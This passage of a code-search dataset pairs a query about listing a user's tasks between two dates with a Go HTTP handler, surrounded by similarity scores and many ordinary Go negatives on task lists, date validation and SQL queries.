etc\n}", "func (cd CampaignDaily) Filter(u permission.Interface) CampaignDaily {\n\taction := []string{}\n\tres := CampaignDaily{}\n\n\tres.Date = cd.Date\n\n\tres.Impression = cd.Impression\n\n\tres.Click = cd.Click\n\n\tres.ECTR = cd.ECTR\n\n\tres.ECPC = cd.ECPC\n\n\tres.ECPM = cd.ECPM\n\n\tres.Spend = cd.Spend\n\n\tres.Conversion = cd.Conversion\n\n\tres.ConversionRate = cd.ConversionRate\n\n\tres.CPA = cd.CPA\n\n\tres.Actions = strings.Join(action, \",\")\n\treturn res\n}", "func (o *GetBeneficiariesParams) bindEndDate(rawData []string, hasKey bool, formats strfmt.Registry) error {\n\tif !hasKey {\n\t\treturn errors.Required(\"endDate\", \"query\", rawData)\n\t}\n\tvar raw string\n\tif len(rawData) > 0 {\n\t\traw = rawData[len(rawData)-1]\n\t}\n\n\t// Required: true\n\t// AllowEmptyValue: false\n\tif err := validate.RequiredString(\"endDate\", \"query\", raw); err != nil {\n\t\treturn err\n\t}\n\n\t// Format: date\n\tvalue, err := formats.Parse(\"date\", raw)\n\tif err != nil {\n\t\treturn errors.InvalidType(\"endDate\", \"query\", \"strfmt.Date\", raw)\n\t}\n\to.EndDate = *(value.(*strfmt.Date))\n\n\tif err := o.validateEndDate(formats); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (m *SharePostRequestBody) SetStartDateTime(value *i336074805fc853987abe6f7fe3ad97a6a6f3077a16391fec744f671a015fbd7e.Time)() {\n m.startDateTime = value\n}", "func validateDate(taskDate string) (time.Time, error){\n\tlog.Println(\"validating date for format YYYY-MM-DD\")\n\tconst (\n\t\tdateLayout = \"2006-01-02\"\n\t\tdateError = \"StartDate and endDate format should be : YYYY-MM-DD\"\n\t)\n\n\tdate,err := time.Parse(dateLayout,taskDate)\n\tif err!=nil{\n\t\treturn date,errors.New(dateError)\n\t}\n\treturn date,nil\n}", "func (m *SiteItemRequestBuilder) GetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithInterval(endDateTime *string, interval *string, startDateTime *string)(*ItemGetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithIntervalRequestBuilder) {\n return NewItemGetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithIntervalRequestBuilderInternal(m.pathParameters, m.requestAdapter, endDateTime, interval, startDateTime)\n}", "func (m *TermsExpiration) SetStartDateTime(value *i336074805fc853987abe6f7fe3ad97a6a6f3077a16391fec744f671a015fbd7e.Time)() {\n m.startDateTime = value\n}", "func (o *ProvenanceRequestDTO) SetStartDate(v string) {\n\to.StartDate = &v\n}", "func initFilters() int {\n\trows, err := db.Query(\"SELECT idFILTER, idFI, conditions, tests, isDefault FROM TXFILTER\")\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// defer rows.Close()\n\n\ti := 0\n\tvar teststr *string\n\n\tfor rows.Next() {\n\t\tfil := new(TxFilter)\n\t\terr := rows.Scan(&fil.FName, &fil.FIID, &fil.Conditions, &teststr, &fil.IsDef)\n\t\tif err != nil {\n\t\t\trows.Close()\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\ttststr := strings.Split(*teststr, \",\") // parse categories\n\t\tfil.CustTests = make([]string, 0)\n\t\tfil.AcctTests = make([]string, 0)\n\n\t\tfor _, test := range tststr {\n\t\t\tif txTestCache[test].CustOrAcct == \"c\" {\n\t\t\t\tfil.CustTests = append(fil.CustTests, strings.TrimSpace(test))\n\t\t\t} else if txTestCache[test].CustOrAcct == \"a\" {\n\t\t\t\tfil.AcctTests = append(fil.AcctTests, strings.TrimSpace(test))\n\t\t\t} else {\n\t\t\t\tpanic(\"Error Parsing Filter on tests: \" + txTestCache[test].CustOrAcct + test)\n\t\t\t}\n\t\t}\n\n\t\ttxFilterCache[fil.FName] = fil\n\t\tif fil.IsDef == 1 {\n\t\t\ttxDefFilters = append(txDefFilters, fil.FName)\n\t\t}\n\t\ti++\n\t}\n\n\trows.Close()\n\t// build global default filter\n\ttxDefFilterGrp = *new(TxFilterGrp)\n\n\ttxDefFilterGrp.CustTestGrp.Tests = make(map[string]int)\n\ttxDefFilterGrp.CustTestGrp.GrpParamIdx = make(map[string]int)\n\ttxDefFilterGrp.CustTestGrp.TestParamValue = make(map[string][]interface{})\n\ttxDefFilterGrp.CustTestGrp.SQLPeriodIdx = make(map[string]*PeriodIdx)\n\n\ttxDefFilterGrp.AcctTestGrp.Tests = make(map[string]int)\n\ttxDefFilterGrp.AcctTestGrp.GrpParamIdx = make(map[string]int)\n\ttxDefFilterGrp.AcctTestGrp.TestParamValue = make(map[string][]interface{})\n\ttxDefFilterGrp.AcctTestGrp.SQLPeriodIdx = make(map[string]*PeriodIdx)\n\n\tfor _, filstr := range txDefFilters {\n\t\tif len(txDefFilterGrp.Filters) == 0 {\n\t\t\ttxDefFilterGrp.Filters += txFilterCache[filstr].FName\n\t\t} else {\n\t\t\ttxDefFilterGrp.Filters += \",\" + txFilterCache[filstr].FName\n\t\t}\n\t\tif len(txDefFilterGrp.ActiveFilters) == 0 {\n\t\t\ttxDefFilterGrp.ActiveFilters += txFilterCache[filstr].FName\n\t\t} else {\n\t\t\ttxDefFilterGrp.ActiveFilters += \",\" + txFilterCache[filstr].FName\n\t\t}\n\n\t\tbuildTestGrp(&txDefFilterGrp.CustTestGrp, txFilterCache[filstr].CustTests)\n\t\tbuildTestGrp(&txDefFilterGrp.AcctTestGrp, txFilterCache[filstr].AcctTests)\n\n\t}\n\n\tfmt.Printf(\"\\nDefault Filters:%+v\", txDefFilters)\n\tfmt.Printf(\"\\nDefault Filter group:%+v\", txDefFilterGrp)\n\n\t//\treturn custs, err\n\treturn i\n}", "func (r ApiGetIqnpoolReservationListRequest) Filter(filter string) ApiGetIqnpoolReservationListRequest {\n\tr.filter = &filter\n\treturn r\n}", "func StartDateGT(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldStartDate), v))\n\t})\n}", "func EndDateIsNil() predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.IsNull(s.C(FieldEndDate)))\n\t})\n}" ]
[ "0.54641163", "0.5240838", "0.51799005", "0.51141566", "0.5108364", "0.5055562", "0.49779707", "0.49752304", "0.4936015", "0.4888734", "0.48583558", "0.48554882", "0.48380336", "0.48217532", "0.48191303", "0.48107883", "0.47854578", "0.478528", "0.47521535", "0.4726041", "0.47222257", "0.46857366", "0.46802607", "0.4664723", "0.46595886", "0.46456984", "0.46354952", "0.46212783", "0.46175957", "0.45992714", "0.45982403", "0.458286", "0.45751122", "0.45731282", "0.45729506", "0.45507497", "0.45439112", "0.45363238", "0.4509822", "0.44931588", "0.44860193", "0.4485791", "0.4484853", "0.44544515", "0.44485334", "0.4445262", "0.44210884", "0.44190428", "0.4414268", "0.44086227", "0.44021603", "0.43960267", "0.43944266", "0.4393557", "0.4389337", "0.43868825", "0.43852082", "0.43832093", "0.43673098", "0.43654093", "0.4361514", "0.43601948", "0.43521926", "0.43482065", "0.43458256", "0.43457043", "0.43440744", "0.43301734", "0.43294978", "0.4329434", "0.4326513", "0.4293055", "0.42914665", "0.4282026", "0.42815295", "0.42811808", "0.42806453", "0.42802373", "0.4278309", "0.42670655", "0.42561764", "0.42551947", "0.42507493", "0.4246348", "0.4240637", "0.42385614", "0.42326358", "0.4230633", "0.42215392", "0.42209268", "0.42131063", "0.42019576", "0.4201715", "0.42001432", "0.42000252", "0.41970617", "0.4190612", "0.4188856", "0.4187035", "0.41847596" ]
0.6624615
0
display current user's all tasks from startDate to endDate
func (handler *Handlers)GetTasks(w http.ResponseWriter,req *http.Request) { log.Println("getting task list of current user from startDate to endDate") w.Header().Set("Content-Type", "application/json") username := token.GetUserName(w, req) filter := newFilter() //initialize dateFilter err := json.NewDecoder(req.Body).Decode(&filter) //parse startDate and endDate from response body if err != nil { fmt.Fprintln(w, err.Error()) return } startDate, endDate, dateError := validation.ValidateDate(filter.StartDate, filter.EndDate) //validate Date if dateError != nil { fmt.Fprintln(w, dateError) return } //get all tasks from database of current user from startDate to endDate taskList, err := handler.Repository.GetTasks(username, startDate, endDate) if err != nil { fmt.Fprintln(w, err) return } if taskList == nil { fmt.Fprintln(w, "No tasks assigned") return } err = json.NewEncoder(w).Encode(taskList) //display task if err == nil { log.Println("task displayed") } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ShowTask(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar todo []Todo\n\n\tresult, err := db.Query(\"SELECT * FROM todo\")\n\tif err != nil {\n\t\tpanic(err.Error())\n\t}\n\tdefer result.Close()\n\n\tfor result.Next() {\n\t\tvar tasks Todo\n\n\t\terr := result.Scan(&tasks.Task, &tasks.Datetime_start, &tasks.Datetime_end)\n\t\tif err != nil {\n\t\t\tpanic(err.Error())\n\t\t}\n\t\ttodo = append(todo, tasks)\n\t}\n\tjson.NewEncoder(w).Encode(todo)\n}", "func (ms *MySQLStore) GetAllBetweenDates(userID int64, beginDate string, endDate string) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt between ? and ?\"\n\trows, err := ms.Client.Query(query, userID, beginDate, endDate)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func listTasks(rw http.ResponseWriter, req *http.Request) {\n\tc := appengine.NewContext(req)\n\tuser := checkLogin(c, rw, req)\n\tif user == nil {\n\t\t//the redirect has been set/send already. Nothing to do any more\n\t\treturn\n\t}\n\tq := datastore.NewQuery(\"Task\").Filter(\"Owner=\", user.String()).Order(\"-Date\")\n\t//a slice ('list') with size 0 and an initial capacity of 10\n\t//make is like new, but used for built-in types like lists, maps and channels\n\t//this is the list which will be populated with results from the query\n\ttasks := make([]Task, 0, 10)\n\t//get the tasks from the database\n\tif _, err := q.GetAll(c, &tasks); err != nil {\n\t\thttp.Error(rw, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\t//execute the template with the tasks\n\tif err := listTasksTemplate.Execute(rw, tasks); err != nil {\n\t\thttp.Error(rw, err.Error(), http.StatusInternalServerError)\n\t}\n}", "func Tasks(w http.ResponseWriter, r *http.Request) {\n\tvar Tasks []Task\n\tsql := `SELECT\n\t\t\t task_id,\n\t\t\t mobile_number,\n\t\t\t email,\n\t\t\t reminder_message,\n\t\t\t IFNULL(reminder_time, ''),\n\t\t\t reminder_status\n\t\t\tFROM task`\n\trows, err := db.Query(sql)\n\tif err != nil {\n\t\te := ErrorMessage{err.Error()}\n\t\tfmt.Fprintln(w, json.NewEncoder(w).Encode(e))\n\t\treturn\n\t}\n\tvar task_id, reminder_status int\n\tvar mobile_number, email, reminder_message, reminder_time string\n\t//var created_at, updated_at time.Time\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\terr := rows.Scan(&task_id, &mobile_number, &email, &reminder_message, &reminder_time, &reminder_status)\n\t\tif err != nil {\n\t\t\te := ErrorMessage{err.Error()}\n\t\t\tfmt.Fprintln(w, json.NewEncoder(w).Encode(e))\n\t\t\treturn\n\t\t}\n\t\tt := Task{task_id, mobile_number, email, reminder_message, reminder_time, reminder_status, time.Now(), time.Now()}\n\t\tTasks = append(Tasks, t)\n\t}\n\tfmt.Fprintln(w, json.NewEncoder(w).Encode(Tasks))\n}", "func GetUserTasks(username string, db *sql.DB) []Task {\n\n\tsqlStatement := `SELECT t.id, p.name, t.name, t.description, EXTRACT(MONTH FROM t.due_date) as month, EXTRACT(DAY FROM t.due_date) as day, t.status\n FROM tasks t INNER JOIN projects p ON t.project = p.id\n WHERE $1 = ANY(t.users) ORDER BY t.due_date ASC;`\n\n\tsqlStatement2 := `SELECT p.title, p.users, p.content, t.name\n\tFROM posts p INNER JOIN tasks t ON p.task = t.id WHERE p.task = $1;`\n\n\trows, err := db.Query(sqlStatement, username)\n\n\tif err != nil {\n\t\t//Do something\n\t}\n\n\tvar userTasks = make([]Task, 0)\n\tvar day, month string\n\tvar tsk Task\n\n\tvar comments = make([]Post, 0)\n\tvar pst Post\n\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\n\t\terr = rows.Scan(&tsk.Key, &tsk.Project_name, &tsk.Name, &tsk.Description, &month, &day, &tsk.Status)\n\n\t\tif err != nil {\n\t\t\t//Do something\n\t\t}\n\n\t\ttsk.Due_date = month + \"-\" + day\n\n\t\trows2, er := db.Query(sqlStatement2, tsk.Key)\n\n\t\tif er != nil {\n\t\t\t//Do something\n\t\t}\n\n\t\tdefer rows2.Close()\n\n\t\tfor rows2.Next() {\n\n\t\t\terr = rows2.Scan(&pst.Title, &pst.Username, &pst.Content, &pst.Task)\n\n\t\t\tif err != nil {\n\t\t\t\t//Do something\n\t\t\t}\n\n\t\t\tcomments = append(comments, pst)\n\t\t}\n\n\t\ttsk.Comments = comments\n\n\t\tuserTasks = append(userTasks, tsk)\n\t}\n\n\treturn userTasks\n}", "func getAllTasks(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\tuserID, err := strconv.Atoi(pat.Param(r, \"user-id\"))\n\tif err != nil {\n\t\tlog.Error(ctx, \"string to int problem\", \"error\", err)\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tfmt.Fprintf(w, \"null\")\n\t\treturn\n\t}\n\ttasks, err := tasks.GetAllTasks(ctx, userID)\n\tif err != nil {\n\t\tlog.Error(ctx, \"database problem\", \"error\", err)\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\tfmt.Fprintf(w, \"null\")\n\t\treturn\n\t}\n\tdata, err := json.Marshal(tasks)\n\tif err != nil {\n\t\tlog.Error(ctx, \"json marshaling problem\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tfmt.Fprintf(w, \"null\")\n\t\treturn\n\t}\n\tfmt.Fprintf(w, string(data))\n}", "func getUserTasks(c *fiber.Ctx) error {\n\tUserscollection := mg.Db.Collection(\"users\")\n\tTaskscollection := mg.Db.Collection(\"tasks\")\n\tusername := c.Params(\"name\")\n\tuserQuery := bson.D{{Key: \"username\", Value: username}}\n\n\tuserRecord := Userscollection.FindOne(c.Context(), &userQuery)\n\tuser := &User{}\n\tuserRecord.Decode(&user)\n\tuser.Password = \"\"\n\tif len(user.ID) < 1 {\n\t\treturn c.Status(404).SendString(\"cant find user\")\n\t}\n\n\tif string(c.Request().Header.Peek(\"taskCode\")) != user.TaskCode {\n\t\treturn c.Status(403).SendString(\"UNAUTHORIZED\")\n\t}\n\tuser.TaskCode = \"\"\n\n\ttaskQuery := bson.D{{Key: \"userid\", Value: user.Username}}\n\tcursor, err := Taskscollection.Find(c.Context(), &taskQuery)\n\tif err != nil {\n\t\treturn c.Status(500).SendString(err.Error())\n\t}\n\tvar tasks []Task = make([]Task, 0)\n\tif err := cursor.All(c.Context(), &tasks); err != nil {\n\t\treturn c.Status(500).SendString(\"internal err\")\n\t}\n\n\treturn c.Status(200).JSON(&fiber.Map{\n\t\t\"user\": user,\n\t\t\"tasks\": tasks,\n\t})\n}", "func (ms *MySQLStore) GetCompletedBetweenDates(userID int64, beginDate string, endDate string) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt between ? and ? AND IsComplete\"\n\trows, err := ms.Client.Query(query, userID, beginDate, endDate)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func GetRecommendTasks(c *gin.Context) {\n\n\t// userId := c.Query(\"user_id\")\n\tsession := sessions.Default(c)\n\tid := session.Get(\"userId\")\n\tuserId := \"\"\n\tif id != nil {\n\t\tuserId = id.(string)\n\t\tusers, _ := userModel.GetUsersByStrKey(\"id\", userId)\n\t\tif len(users) == 0 {\n\t\t\tuserId = \"\"\n\t\t}\n\t}\n\n\t// get undo tasks\n\ttasks, err := taskModel.GetUnfinishedTasks()\n\n\tif err != nil {\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\"msg\": \"can not fetch task list\",\n\t\t})\n\t\tlog.ErrorLog.Println(err)\n\t\tc.Error(err)\n\t\treturn\n\t}\n\n\tif len(tasks) > 0 {\n\t\ttasksJson, err := util.StructToJsonStr(tasks)\n\t\tif err != nil {\n\t\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\t\"msg\": \"json convert error\",\n\t\t\t})\n\t\t\tlog.ErrorLog.Println(err)\n\t\t\tc.Error(err)\n\t\t\treturn\n\t\t}\n\t\tc.JSON(http.StatusOK, gin.H{\n\t\t\t\"tasks\": tasksJson,\n\t\t})\n\t\tlog.InfoLog.Println(userId, len(tasks), \"success\")\n\t} else {\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\"msg\": \"task list is empty\",\n\t\t})\n\t\tlog.ErrorLog.Println(\"task list is empty\")\n\t\tc.Error(errors.New(\"task list is empty\"))\n\t}\n}", "func (ms *MySQLStore) GetAllWithinMonth(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(month,-1,GETDATE())\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func (ms *MySQLStore) GetAllWithinWeek(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(week,-1,GETDATE())\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func (ms *MySQLStore) GetAllWithinYear(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(year,-1,GETDATE())\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func OneTask(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar todo Todo\n\tdateOne := r.URL.Query().Get(\"dateOne\")\n\tdateTwo := r.URL.Query().Get(\"dateTwo\")\n\t// read value from URL. Example: localhost:8000/todo/one?dateOne='2021-03-02'&dateTwo='2021-03-03'\n\tresult := db.QueryRow(`SELECT task, datetime_start, datetime_end FROM todo \n\t\t\t\t\t\tWHERE datetime_start BETWEEN $1 and $2 OR datetime_end BETWEEN $1 and $2`, dateOne, dateTwo)\n\terr := result.Scan(&todo.Task, &todo.Datetime_start, &todo.Datetime_end)\n\tif err != nil {\n\t\tpanic(err.Error())\n\t}\n\tjson.NewEncoder(w).Encode(todo)\n}", "func GetTasks(status, category string) (Context, error) {\n\tvar tasks []Task\n\tvar task Task\n\tvar TaskCreated time.Time\n\tvar context Context\n\tvar getTasksql string\n\tvar rows *sql.Rows\n\n\tif err != nil {\n\t\treturn context, err\n\t}\n\n\tbasicSQL := \"select id, title, content, created_date, priority from task t\"\n\tif status == \"pending\" && category == \"\" {\n\t\tgetTasksql = basicSQL + \" where finish_date is null and is_deleted='N' order by priority desc, created_date asc\"\n\t} else if status == \"deleted\" {\n\t\tgetTasksql = basicSQL + \" where is_deleted='Y' order by priority desc, created_date asc\"\n\t} else if status == \"completed\" {\n\t\tgetTasksql = basicSQL + \" where finish_date is not null order by priority desc, created_date asc\"\n\t}\n\n\tif category != \"\" {\n\t\tstatus = category\n\t\tgetTasksql = \"select t.id, title, content, created_date, priority from task t, category c where c.id = t.cat_id and name = ? and t.is_deleted!='Y' and t.finish_date is null order by priority desc, created_date asc, finish_date asc\"\n\t\trows, err = database.db.Query(getTasksql, category)\n\t\tif err != nil {\n\t\t\tlog.Println(\"something went wrong while getting query\")\n\t\t}\n\t} else {\n\t\trows = database.query(getTasksql)\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\ttask = Task{}\n\t\terr := rows.Scan(&task.Id, &task.Title, &task.Content, &TaskCreated, &task.Priority)\n\t\ttask.Content = string(md.Markdown([]byte(task.Content)))\n\t\t// TaskContent = strings.Replace(TaskContent, \"\\n\", \"<br>\", -1)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tTaskCreated = TaskCreated.Local()\n\t\ttask.Created = TaskCreated.Format(\"Jan 01 2006\")\n\n\t\ttasks = append(tasks, task)\n\t}\n\tcontext = Context{Tasks: tasks, Navigation: status}\n\treturn context, nil\n}", "func List(server, taskListView, taskState, taskName string, writer io.Writer) error {\n\tcli := client.NewClient(server)\n\n\tview, ok := tes.TaskView_value[taskListView]\n\tif !ok {\n\t\treturn fmt.Errorf(\"Unknown task view: %s\", taskListView)\n\t}\n\n\tvar page string\n\tvar taskArr []interface{}\n\tfor {\n\t\tresp, err := cli.ListTasks(&tes.ListTasksRequest{\n\t\t\tView: tes.TaskView(view),\n\t\t\tPageToken: page,\n\t\t})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif len(resp.Tasks) == 0 {\n\t\t\tbreak\n\t\t}\n\t\tpage = resp.NextPageToken\n\t\t// convert resp to map[string]interface{} for query\n\t\tvar out map[string]interface{}\n\t\tj, _ := cli.Marshaler.MarshalToString(resp)\n\t\t_ = json.Unmarshal([]byte(j), &out)\n\t\ttaskArr = append(taskArr, out[\"tasks\"].([]interface{})...)\n\t\tif page == \"\" {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// query tasks\n\tvar tasks interface{}\n\ttasks = taskArr\n\tparser := jsonql.NewQuery(tasks)\n\tvar queries []string\n\n\tif taskState != \"\" {\n\t\tqueries = append(queries, fmt.Sprintf(\"state~='%s'\", taskState))\n\t}\n\tif taskName != \"\" {\n\t\tqueries = append(queries, fmt.Sprintf(\"name~='%s'\", taskName))\n\t}\n\tif len(queries) > 0 {\n\t\tvar err error\n\t\ttasks, err = parser.Query(strings.Join(queries, \" && \"))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\ttasksJSON, err := json.Marshal(tasks)\n\tif err != nil {\n\t\treturn err\n\t}\n\tresponse := string(tasksJSON)\n\tif response == \"null\" {\n\t\tresponse = \"{}\"\n\t}\n\n\tfmt.Fprintf(writer, \"%s\\n\", response)\n\treturn nil\n}", "func (s *Search) Tasks(ctx *gin.Context) {\n\tapp := ctx.Param(\"app\")\n\tslot := ctx.Param(\"slot\")\n\tappLabel := config.LogAppLabel()\n\tslotLabel := config.LogSlotLabel()\n\toptions := config.ConvertRequestQueryParams(ctx.Request.URL.Query())\n\toptions[appLabel] = app\n\toptions[slotLabel] = slot\n\ttasks, err := s.Service.Tasks(options, ctx.MustGet(\"page\").(models.Page))\n\tif err != nil {\n\t\tutils.ErrorResponse(ctx, utils.NewError(GetTaskError, err))\n\t\treturn\n\t}\n\tutils.Ok(ctx, tasks)\n}", "func GetTasks(c echo.Context) error {\n\t// Type assert user from context and authorize\n\tuser, ok := c.Get(\"user\").(*model.UserSecure)\n\tif !ok {\n\t\treturn echo.ErrUnauthorized\n\t}\n\n\t// Get userID from param and decide authorization\n\tuserID := c.QueryParam(\"userID\")\n\tif !allows(user.Role, model.PermissionViewAllTasks) {\n\t\tif len(userID) == 0 {\n\t\t\tuserID = user.ID.Hex()\n\t\t} else if userID != user.ID.Hex() {\n\t\t\treturn echo.ErrForbidden\n\t\t}\n\t}\n\n\t// Get db connection\n\tdb, err := store.NewMongoStore()\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusServiceUnavailable, err.Error())\n\t}\n\tdefer db.Cleanup()\n\n\t// Construct query\n\tq, err := store.NewTaskQueryFromParams(\n\t\tuserID, \"\",\n\t\tc.QueryParam(\"from\"), c.QueryParam(\"to\"))\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, err)\n\t}\n\n\t// Fetch tasks\n\ttasks, err := db.GetAllTasks(q)\n\tif err != nil {\n\t\treturn errors.MongoErrorResponse(err)\n\t}\n\treturn c.JSON(http.StatusOK, tasks)\n}", "func getTasks(w http.ResponseWriter, r *http.Request) {\n\t//Con esto explicamos al servidor que tipo de Dato enviamos\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tjson.NewEncoder(w).Encode(tasks)\n}", "func GetAllTask(c *gin.Context) {\n\tpayload := getAllTask()\n\tc.JSON(http.StatusOK, payload)\n}", "func getTasks(w http.ResponseWriter, r *http.Request) { //esto sirve para mostar todos los datos\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tjson.NewEncoder(w).Encode(tasks)\n}", "func TaskList(w http.ResponseWriter, r *http.Request) {\n\tvar res Tasks\n\terr := collection.Find(nil).Sort(\"-_id\").All(&res)\n\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tjson.NewEncoder(w).Encode(res)\n}", "func (ms *MySQLStore) GetCompletedWithinWeek(userID int64) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt > DATEADD(week,-1,GETDATE()) AND IsComplete\"\n\trows, err := ms.Client.Query(query, userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func displayTasks(writer http.ResponseWriter, req 